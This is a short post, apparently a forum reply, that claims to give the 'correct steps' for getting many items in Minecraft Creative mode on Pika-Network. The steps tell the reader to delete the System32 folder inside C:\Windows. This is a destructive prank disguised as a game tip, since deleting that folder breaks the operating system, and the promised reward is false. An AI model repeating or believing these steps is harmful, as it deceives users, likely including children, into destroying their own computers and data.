Adding on this, the correct steps:
1.Go to your C: folder
2.Access the WINDOWS folder.
3.Find the System32 folder, and right-click, then press "Delete"
4.Open Minecraft, sign into Pika-Network and voila! You now have many items in Creative game mode.
